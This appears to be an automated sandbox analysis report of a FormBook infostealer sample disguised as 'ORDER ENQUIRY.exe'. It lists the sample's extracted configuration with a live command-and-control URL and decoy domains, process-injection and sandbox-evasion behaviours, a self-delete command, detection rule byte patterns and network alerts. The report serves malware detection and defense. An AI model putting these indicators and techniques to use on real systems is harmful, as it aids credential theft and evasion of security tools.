Edit tour

Windows Analysis Report
ORDER ENQUIRY.exe

Overview

General Information

Sample name:	ORDER ENQUIRY.exe
Analysis ID:	1523220
MD5:	754fa726ba767c17ebbce69e967d40ca
SHA1:	b011ef478a435e685c3180d10c1c25bbc58ce105
SHA256:	79bcad797129c0be508de0fe7b0462b1aaffbafa74a4e7019a4561deb674f4bd
Tags:	exeuser-lowmal3
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

ORDER ENQUIRY.exe (PID: 3032 cmdline: "C:\Users\user\Desktop\ORDER ENQUIRY.exe" MD5: 754FA726BA767C17EBBCE69E967D40CA)

ORDER ENQUIRY.exe (PID: 4564 cmdline: "C:\Users\user\Desktop\ORDER ENQUIRY.exe" MD5: 754FA726BA767C17EBBCE69E967D40CA)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

colorcpl.exe (PID: 3944 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)

cmd.exe (PID: 6128 cmdline: /c del "C:\Users\user\Desktop\ORDER ENQUIRY.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.avai66.xyz/hy08/"], "decoy": ["weazc.top", "servoceimmpajhnuz.info", "vqemkdhi.xyz", "wergol.com", "spa-mk.com", "rtpsid88.life", "tatetits.fun", "raidsa.xyz", "suojiansuode.net", "jointhejunction.com", "wudai.net", "typeboot.shop", "mksport-app.com", "miocloud.ovh", "taipan77pandan.com", "wwwhg58a.com", "khuahamiksai31.pro", "carpedatumllc.net", "safebinders.com", "krx21.com", "qyld9yp.icu", "ischover.com", "lineagegenetics.com", "breakfreesoar.com", "os9user.com", "m1rmen.tech", "cttlca.click", "privacysift.com", "gilggak.com", "horxncnt.xyz", "strategyguys.info", "egyptflickcasino.online", "5536canoga.com", "ilpradio.com", "shahgoldentravel.com", "autismtour.com", "alivioquantico.com", "valo.games", "manhuafeifei.xyz", "bihungoreng22.click", "btc158.com", "500728.party", "hemcksqa.net", "agclcdstf460.xyz", "flywatchsecurity.com", "bedazzledbabe.com", "btcrenaissance.net", "mavincrm.com", "65618.asia", "axgventures.com", "arelenegrace.com", "cryptosmartguide.xyz", "bodgion.xyz", "21556934.com", "cheaplaptops.biz", "v2e5g.xyz", "yc23w.top", "24khome.com", "cdncf.xyz", "marabudigital.online", "3sqre.lol", "entgab679y.top", "b10a.shop", "mekanbahis104.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.4564943648.00000000106AF000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xb42:$a2: pass 0xb48:$a3: email 0xb4f:$a4: login 0xb56:$a5: signin 0xb67:$a6: persistent 0xd3a:$r1: C:\Users\user\AppData\Roaming\9MMP72D2\9MMlog.ini
00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7e669:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d83d1:$a1: 3C 30 50 4F 53 54 74 09 40 0x2067f1:$a1: 3C 30 50 4F 53 54 74 09 40 0x94fc8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1eed30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x21d150:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x82dd7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1dcb3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x20af5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x8dcbf:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x1e7a27:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x215e47:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x81d20:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x81f8a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1dba88:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1dbcf2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x209ea8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x20a112:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8dabd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1e7825:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x215c45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8d5a9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1e7311:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x215731:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8dbbf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1e7927:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x215d47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8dd37:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1e7a9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x215ebf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x829a2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1dc70a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x20ab2a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x90c51:$sqlite3step: 68 34 1C 7B E1 0x90d64:$sqlite3step: 68 34 1C 7B E1 0x1ea9b9:$sqlite3step: 68 34 1C 7B E1 0x1eaacc:$sqlite3step: 68 34 1C 7B E1 0x218dd9:$sqlite3step: 68 34 1C 7B E1 0x218eec:$sqlite3step: 68 34 1C 7B E1 0x90c80:$sqlite3text: 68 38 2A 90 C5 0x90da5:$sqlite3text: 68 38 2A 90 C5 0x1ea9e8:$sqlite3text: 68 38 2A 90 C5 0x1eab0d:$sqlite3text: 68 38 2A 90 C5 0x218e08:$sqlite3text: 68 38 2A 90 C5 0x218f2d:$sqlite3text: 68 38 2A 90 C5 0x90c93:$sqlite3blob: 68 53 D8 7F 8C 0x90dbb:$sqlite3blob: 68 53 D8 7F 8C 0x1ea9fb:$sqlite3blob: 68 53 D8 7F 8C 0x1eab23:$sqlite3blob: 68 53 D8 7F 8C 0x218e1b:$sqlite3blob: 68 53 D8 7F 8C 0x218f43:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: ORDER ENQUIRY.exe PID: 3032	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ORDER ENQUIRY.exe PID: 3032	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5a876:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: ORDER ENQUIRY.exe PID: 4564	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x104:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: colorcpl.exe PID: 3944	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xa8971:$a1: 3C 30 50 4F 53 54 74 09 40 0xaa0b1:$a1: 3C 30 50 4F 53 54 74 09 40 0x188a18:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.ORDER ENQUIRY.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.ORDER ENQUIRY.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.ORDER ENQUIRY.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.2.ORDER ENQUIRY.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.ORDER ENQUIRY.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T10:05:00.616006+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.5	49724	151.101.0.119	80	TCP
2024-10-01T10:05:00.616006+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.5	49722	3.33.130.190	80	TCP
2024-10-01T10:05:00.616006+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.5	49723	154.197.185.220	80	TCP
2024-10-01T10:06:02.624066+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.5	49719	199.59.243.227	80	TCP
2024-10-01T10:06:22.816992+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.5	49720	154.221.68.229	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.avai66.xyz/hy08/"], "decoy": ["weazc.top", "servoceimmpajhnuz.info", "vqemkdhi.xyz", "wergol.com", "spa-mk.com", "rtpsid88.life", "tatetits.fun", "raidsa.xyz", "suojiansuode.net", "jointhejunction.com", "wudai.net", "typeboot.shop", "mksport-app.com", "miocloud.ovh", "taipan77pandan.com", "wwwhg58a.com", "khuahamiksai31.pro", "carpedatumllc.net", "safebinders.com", "krx21.com", "qyld9yp.icu", "ischover.com", "lineagegenetics.com", "breakfreesoar.com", "os9user.com", "m1rmen.tech", "cttlca.click", "privacysift.com", "gilggak.com", "horxncnt.xyz", "strategyguys.info", "egyptflickcasino.online", "5536canoga.com", "ilpradio.com", "shahgoldentravel.com", "autismtour.com", "alivioquantico.com", "valo.games", "manhuafeifei.xyz", "bihungoreng22.click", "btc158.com", "500728.party", "hemcksqa.net", "agclcdstf460.xyz", "flywatchsecurity.com", "bedazzledbabe.com", "btcrenaissance.net", "mavincrm.com", "65618.asia", "axgventures.com", "arelenegrace.com", "cryptosmartguide.xyz", "bodgion.xyz", "21556934.com", "cheaplaptops.biz", "v2e5g.xyz", "yc23w.top", "24khome.com", "cdncf.xyz", "marabudigital.online", "3sqre.lol", "entgab679y.top", "b10a.shop", "mekanbahis104.com"]}

Multi AV Scanner detection for submitted file

Source: ORDER ENQUIRY.exe	Virustotal: Detection: 50%			Perma Link
Source: ORDER ENQUIRY.exe	ReversingLabs: Detection: 57%

Yara detected FormBook

Source: Yara match	File source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: ORDER ENQUIRY.exe

Joe Sandbox ML: detected

Source: ORDER ENQUIRY.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ORDER ENQUIRY.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: gTwj.pdb source: ORDER ENQUIRY.exe
Source:	Binary string: colorcpl.pdbGCTL source: ORDER ENQUIRY.exe, 00000003.00000002.2158318122.0000000001980000.00000040.10000000.00040000.00000000.sdmp, ORDER ENQUIRY.exe, 00000003.00000002.2157829388.0000000001628000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4550455934.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: colorcpl.pdb source: ORDER ENQUIRY.exe, 00000003.00000002.2158318122.0000000001980000.00000040.10000000.00040000.00000000.sdmp, ORDER ENQUIRY.exe, 00000003.00000002.2157829388.0000000001628000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000005.00000002.4550455934.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
